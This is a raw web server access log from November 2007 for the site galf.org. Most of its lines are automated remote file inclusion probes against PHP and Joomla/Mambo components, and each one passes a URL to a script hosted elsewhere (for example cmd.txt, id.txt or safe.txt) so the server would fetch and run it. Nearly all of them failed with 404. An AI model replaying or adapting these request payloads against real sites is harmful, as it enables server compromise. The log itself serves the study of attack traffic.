87.101.4.42 - - [11/Nov/2007:16:24:19 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
87.101.4.42 - - [11/Nov/2007:16:24:19 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
85.214.92.181 - - [11/Nov/2007:16:24:44 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.optometrieforum.nl/phpbb2/includes/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
85.214.92.181 - - [11/Nov/2007:16:24:45 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.optometrieforum.nl/phpbb2/includes/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.galf.org"
72.29.74.15 - - [11/Nov/2007:16:24:47 -0800] "GET /logs/template.php?pagina=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
72.29.74.15 - - [11/Nov/2007:16:24:47 -0800] "GET /logs/template.php?pagina=ftp://ftp.metaltrade.ru/incoming/%FF%FF%FF%FF%FF%FFo%FF%FF%FF%FF%FF%FF/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
72.29.74.15 - - [11/Nov/2007:16:24:48 -0800] "GET /template.php?pagina=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
72.29.74.15 - - [11/Nov/2007:16:24:48 -0800] "GET /template.php?pagina=ftp://ftp.metaltrade.ru/incoming/%FF%FF%FF%FF%FF%FFo%FF%FF%FF%FF%FF%FF/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
72.29.74.15 - - [11/Nov/2007:16:24:52 -0800] "GET /logs//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.74.15 - - [11/Nov/2007:16:24:52 -0800] "GET /logs//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=ftp://ftp.metaltrade.ru/incoming/%FF%FF%FF%FF%FF%FFo%FF%FF%FF%FF%FF%FF/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.74.15 - - [11/Nov/2007:16:24:52 -0800] "GET //administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.74.15 - - [11/Nov/2007:16:24:52 -0800] "GET //administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=ftp://ftp.metaltrade.ru/incoming/%FF%FF%FF%FF%FF%FFo%FF%FF%FF%FF%FF%FF/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.189.130 - - [11/Nov/2007:16:25:59 -0800] "GET /logs/access_070723.log/template.php?pagina=http://www.prog-gaming.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
151.50.51.133 - - [11/Nov/2007:16:26:15 -0800] "GET /logs/access_070709.log HTTP/1.1" 200 1121534 "http://www.google.it/search?hl=it&q=%2Fshop%2Fcatalog%2Fincludes%2Finclude_once.php%3Finclude_file%3D&btnG=Cerca+con+Google&meta=" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9" "www.galf.org"
151.50.51.133 - - [11/Nov/2007:16:26:19 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9" "www.galf.org"
69.93.189.130 - - [11/Nov/2007:16:26:20 -0800] "GET /logs/access_070730.log/template.php?pagina=http://www.prog-gaming.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
151.50.51.133 - - [11/Nov/2007:16:26:33 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9" "www.galf.org"
151.50.51.133 - - [11/Nov/2007:16:27:04 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9" "www.galf.org"
151.50.51.133 - - [11/Nov/2007:16:27:23 -0800] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.phazethree.com/shoponline/images/CMD.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9" "www.galf.org"
160.75.69.1 - - [11/Nov/2007:16:33:39 -0800] "GET /logs/access_070723.log/template.php?pagina=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
160.75.69.1 - - [11/Nov/2007:16:34:10 -0800] "GET /logs/access_070730.log/template.php?pagina=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.30.214.230 - - [11/Nov/2007:16:35:16 -0800] "GET /logs/access_071014.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
68.180.250.107 - - [11/Nov/2007:16:35:50 -0800] "GET /logs/access_070709.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
72.29.74.15 - - [11/Nov/2007:16:37:53 -0800] "GET /logs//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
72.29.74.15 - - [11/Nov/2007:16:37:53 -0800] "GET /logs//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=ftp://ftp.metaltrade.ru/incoming/%FF%FF%FF%FF%FF%FFo%FF%FF%FF%FF%FF%FF/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
72.29.74.15 - - [11/Nov/2007:16:37:53 -0800] "GET //administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
72.29.74.15 - - [11/Nov/2007:16:37:53 -0800] "GET //administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=ftp://ftp.metaltrade.ru/incoming/%FF%FF%FF%FF%FF%FFo%FF%FF%FF%FF%FF%FF/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
80.201.245.187 - - [11/Nov/2007:16:38:11 -0800] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
80.201.245.187 - - [11/Nov/2007:16:38:12 -0800] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
80.201.245.187 - - [11/Nov/2007:16:38:18 -0800] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
80.201.245.187 - - [11/Nov/2007:16:38:18 -0800] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
78.129.138.76 - - [11/Nov/2007:16:38:22 -0800] "GET /logs/access_071015.log/index.php?x=http://www.waldemarnowakowski.com/chat/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
78.129.138.76 - - [11/Nov/2007:16:38:22 -0800] "GET /index.php?x=http://www.waldemarnowakowski.com/chat/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
78.129.138.76 - - [11/Nov/2007:16:38:23 -0800] "GET /logs/index.php?x=http://www.waldemarnowakowski.com/chat/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.217.130 - - [11/Nov/2007:16:39:29 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.inteligentesite.com.br/arquivos/marajoara/teste.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.217.130 - - [11/Nov/2007:16:39:29 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.inteligentesite.com.br/arquivos/marajoara/teste.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
68.44.185.53 - - [11/Nov/2007:16:41:31 -0800] "GET /logs/access_071015.log/index.php?x=http://www.waldemarnowakowski.com/chat/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
68.44.185.53 - - [11/Nov/2007:16:41:31 -0800] "GET /index.php?x=http://www.waldemarnowakowski.com/chat/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
68.44.185.53 - - [11/Nov/2007:16:41:32 -0800] "GET /logs/index.php?x=http://www.waldemarnowakowski.com/chat/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
69.93.189.130 - - [11/Nov/2007:16:41:46 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.prog-gaming.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.189.130 - - [11/Nov/2007:16:41:46 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.prog-gaming.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
160.75.69.1 - - [11/Nov/2007:16:42:49 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
160.75.69.1 - - [11/Nov/2007:16:42:50 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.84.4.50 - - [11/Nov/2007:16:44:51 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.irscher-jugendclub.de/main//administrator/components/com_comprofiler/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.galf.org"
70.84.4.50 - - [11/Nov/2007:16:44:51 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.irscher-jugendclub.de/main//administrator/components/com_comprofiler/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.galf.org"
74.52.217.130 - - [11/Nov/2007:16:45:57 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.inteligentesite.com.br/arquivos/marajoara/teste.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
74.52.217.130 - - [11/Nov/2007:16:45:57 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.inteligentesite.com.br/arquivos/marajoara/teste.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
203.218.228.42 - - [11/Nov/2007:16:46:03 -0800] "GET /logs/access_071029.log%20%20/contenido/classes/class.inuse.php?cfg[path][contenido]=http://majorna414.com/bilder/DSC_018.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
68.44.185.53 - - [11/Nov/2007:16:46:19 -0800] "GET /logs/access_070806.log/index.php?x=http://www.waldemarnowakowski.com/chat/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
78.129.138.76 - - [11/Nov/2007:16:46:40 -0800] "GET /logs/access_070709.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.waldemarnowakowski.com/chat/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
78.129.138.76 - - [11/Nov/2007:16:46:41 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.waldemarnowakowski.com/chat/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
78.129.138.76 - - [11/Nov/2007:16:46:41 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.waldemarnowakowski.com/chat/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
203.218.228.42 - - [11/Nov/2007:16:48:35 -0800] "GET /logs/contenido/classes/class.inuse.php?cfg[path][contenido]=http://majorna414.com/bilder/DSC_018.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
204.209.9.68 - - [11/Nov/2007:16:49:30 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.zooz.com.br/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
204.209.9.68 - - [11/Nov/2007:16:49:31 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.zooz.com.br/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
157.193.62.155 - - [11/Nov/2007:16:49:53 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://65.102.222.93/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
157.193.62.155 - - [11/Nov/2007:16:49:53 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://65.102.222.93/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
203.218.228.42 - - [11/Nov/2007:16:49:56 -0800] "GET /logs/access_071029.log/contenido/classes/class.inuse.php?cfg[path][contenido]=http://majorna414.com/bilder/DSC_018.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.52.85.106 - - [11/Nov/2007:16:50:06 -0800] "GET //lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.optometrieforum.nl/phpbb2/includes/me.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
74.52.85.106 - - [11/Nov/2007:16:50:06 -0800] "GET /logs//lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.optometrieforum.nl/phpbb2/includes/me.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.galf.org"
85.214.92.181 - - [11/Nov/2007:16:50:42 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.optometrieforum.nl/phpbb2/includes/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
85.214.92.181 - - [11/Nov/2007:16:50:45 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.optometrieforum.nl/phpbb2/includes/id.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.galf.org"
67.15.54.5 - - [11/Nov/2007:16:50:46 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.15.54.5 - - [11/Nov/2007:16:50:47 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.30.216.107 - - [11/Nov/2007:16:50:54 -0800] "GET /logs/scripts.log HTTP/1.0" 200 462383 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
85.214.94.118 - - [11/Nov/2007:16:51:19 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.94.118 - - [11/Nov/2007:16:51:20 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
203.218.228.42 - - [11/Nov/2007:16:52:09 -0800] "GET /contenido/classes/class.inuse.php?cfg[path][contenido]=http://majorna414.com/bilder/DSC_018.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
68.44.185.53 - - [11/Nov/2007:16:52:23 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.waldemarnowakowski.com/chat/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
68.44.185.53 - - [11/Nov/2007:16:52:24 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.waldemarnowakowski.com/chat/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
78.129.138.76 - - [11/Nov/2007:16:52:46 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.waldemarnowakowski.com/chat/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
78.129.138.76 - - [11/Nov/2007:16:52:46 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.waldemarnowakowski.com/chat/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.218.228.42 - - [11/Nov/2007:16:55:57 -0800] "GET /logs/access_071015.log%20%20/contenido/classes/class.inuse.php?cfg[path][contenido]=http://majorna414.com/bilder/DSC_018.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
78.129.138.76 - - [11/Nov/2007:16:57:57 -0800] "GET /logs/access_070709.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.waldemarnowakowski.com/chat/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
78.129.138.76 - - [11/Nov/2007:16:57:57 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.waldemarnowakowski.com/chat/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
78.129.138.76 - - [11/Nov/2007:16:57:57 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.waldemarnowakowski.com/chat/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.218.228.42 - - [11/Nov/2007:17:02:17 -0800] "GET /logs/access_071015.log/contenido/classes/class.inuse.php?cfg[path][contenido]=http://majorna414.com/bilder/DSC_018.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.231.74.206 - - [11/Nov/2007:17:02:23 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.prog-gaming.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.231.74.206 - - [11/Nov/2007:17:02:23 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.prog-gaming.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
157.193.62.155 - - [11/Nov/2007:17:02:49 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://65.102.222.93/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "galf.org"
157.193.62.155 - - [11/Nov/2007:17:02:49 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://65.102.222.93/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64"
70.84.4.50 - - [11/Nov/2007:17:02:57 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.irscher-jugendclub.de/main//administrator/components/com_comprofiler/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.galf.org"
70.84.4.50 - - [11/Nov/2007:17:02:57 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.irscher-jugendclub.de/main//administrator/components/com_comprofiler/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.galf.org"
85.214.94.118 - - [11/Nov/2007:17:04:02 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
85.214.94.118 - - [11/Nov/2007:17:04:03 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
160.75.69.1 - - [11/Nov/2007:17:04:12 -0800] "GET //dotproject/includes/db_adodb.php?baseDir=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.15.54.5 - - [11/Nov/2007:17:07:17 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
67.15.54.5 - - [11/Nov/2007:17:07:17 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
72.30.214.230 - - [11/Nov/2007:17:10:56 -0800] "GET /logs/access_070826.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
68.44.185.53 - - [11/Nov/2007:17:11:01 -0800] "GET /logs/access_071015.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.waldemarnowakowski.com/chat/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
63.148.182.6 - - [11/Nov/2007:17:11:09 -0800] "GET /logs/access_070806.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://bokreta.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
63.148.182.6 - - [11/Nov/2007:17:11:09 -0800] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://bokreta.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
63.148.182.6 - - [11/Nov/2007:17:11:09 -0800] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://bokreta.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
63.148.182.6 - - [11/Nov/2007:17:11:10 -0800] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://bokreta.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
68.44.185.53 - - [11/Nov/2007:17:11:16 -0800] "GET /logs/access_071014.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.waldemarnowakowski.com/chat/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
65.39.140.181 - - [11/Nov/2007:17:12:09 -0800] "GET //mcf.php?content=http://www.neoncomanda.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
63.148.182.6 - - [11/Nov/2007:17:13:11 -0800] "GET /logs/access_071014.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://bokreta.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
64.26.145.91 - - [11/Nov/2007:17:13:40 -0800] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.towaterfront.ca/surveys/strings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.26.145.91 - - [11/Nov/2007:17:13:40 -0800] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.towaterfront.ca/surveys/strings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
65.39.140.181 - - [11/Nov/2007:17:14:57 -0800] "GET /logs/access_071029.log//mcf.php?content=http://www.neoncomanda.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.39.140.181 - - [11/Nov/2007:17:14:57 -0800] "GET /logs//mcf.php?content=http://www.neoncomanda.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.209.9.68 - - [11/Nov/2007:17:15:54 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.zooz.com.br/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "galf.org"
204.209.9.68 - - [11/Nov/2007:17:15:54 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.zooz.com.br/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "galf.org"
87.117.202.152 - - [11/Nov/2007:17:15:56 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://tryon.pagebr.com/kiddies/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.5.54.36 - - [11/Nov/2007:17:16:08 -0800] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.odady.com/images/tOtti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
63.148.182.6 - - [11/Nov/2007:17:17:31 -0800] "GET /logs/access_071015.log/newspublish/include.php?path[docroot]=http://bokreta.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
63.148.182.6 - - [11/Nov/2007:17:17:31 -0800] "GET /newspublish/include.php?path[docroot]=http://bokreta.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
63.148.182.6 - - [11/Nov/2007:17:17:32 -0800] "GET /logs/newspublish/include.php?path[docroot]=http://bokreta.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
63.148.182.6 - - [11/Nov/2007:17:17:33 -0800] "GET /logs/access_071015.log/newspublish/include.php?path[docroot]=http://bokreta.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
